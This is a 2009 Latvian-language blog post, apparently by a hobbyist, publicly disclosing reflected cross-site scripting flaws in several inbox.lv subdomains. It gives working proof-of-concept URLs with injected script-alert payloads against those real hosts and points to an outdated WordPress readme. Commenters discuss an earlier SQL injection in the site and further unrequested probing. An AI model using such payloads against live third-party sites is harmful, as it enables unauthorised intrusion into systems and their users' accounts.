Saturday, 20 June 2009

Anti XSS ieksh inbox.lv

Inbox.lv pats nelietoju, tapeec vareetu teikt ,ka pat nezinaju , kaads tas zveers izskataas. Nejaushi uzduros Googlej0t uz viena bloga, kur itka publicejas:
"Jul 2001–Feb 2007: Chief Developer at Inbox.lv, largest Latvian Internet portal, proud to say it moved from #4 to #1 in terms of weekly unique visitors since I joined the company." jeb vienkarshi Viktors Rotanovs.
Labi , protams rodas iespaids Chief Developer iespejams ka mega labs , par vinja pro neshaubos nemirkli un rekur vel pamaciba bloga par Anti-XSS , tad jau itka visam inbox.lv vajadzetu buut kaartiibaa , ieshu ka es paluukoshos.
Es biju mazliet parsteigts, ka lielako ties tam mega portalam nekas pashu rokam nav rakstits*, pa bazi njemti gatavi mazliet modificeti, ka piem pats pasts tiraka Horde,tie amigos ir viens no MySpace kloniem kuri metajas tiimeklii.
Tad par XSS, uzmetu aci ipashi nechenshoties pat testa pieprasijumu nemainot atradu paariiti.Isak sakot es domaju ka tas viss ir paradijies peec 2007-ta jo Viktors to nebutu pielavis..:)

Amigos, jeb MySpace klons

MySpace Klons
http://amigos.inbox.lv/index.php?mode=report_spam&cat=1&id=155522&from=%22%3E%3Cscript%3Ealert(111);%3C/script%3E
http://amigos.inbox.lv/index.php?mode=report_spam&cat=1&id=155522%22%3E%3Cscript%3Ealert(111);%3C/script%3E
http://amigos.inbox.lv/index.php?mode=report_spam&cat=1%22%3E%3Cscript%3Ealert(111);%3C/script%3E

ps. index vieta admin un esam , pie sprices:)

http://work.inbox.lv/darbs/o-%22%3E%3Cscript%3Ealert(111);%3C/script%3E.html
http://smart.inbox.lv/?logout=1%22%3E%3Cscript%3Ealert(111);%3C/script%3E
http://smart.inbox.lv/cr_game/index.php?game_id=15420&rnd=%22%3E%3Cscript%3Ealert(111);%3C/script%3E
http://smart.inbox.lv/cr_game/index.php?game_id=%22%3E%3Cscript%3Ealert(111);%3C/script%3E

Ja ticet readme.html failam kas metajas tur, tad WP versija ir 1.5:)
http://company.inbox.lv/news/readme.html



PS.Jau ieprieks atvainojos par sagadatam neertibam, ne pret Viktoru ne pret inbox.lv kolektivu nav man nekadas pretenzijas, es tikai garam ejot ,lai paskatitos ,ka jums iet.

2 comments:

4e4en said...

Varbūt papēti drusku tuvāk to sistēmu, jo pirms laba k''ada laika man bija izdevies atrast SQL-Inj iekš viņu help/FAQ sistēmas.

r0t said...

Buus laiks uzmetiishu aci.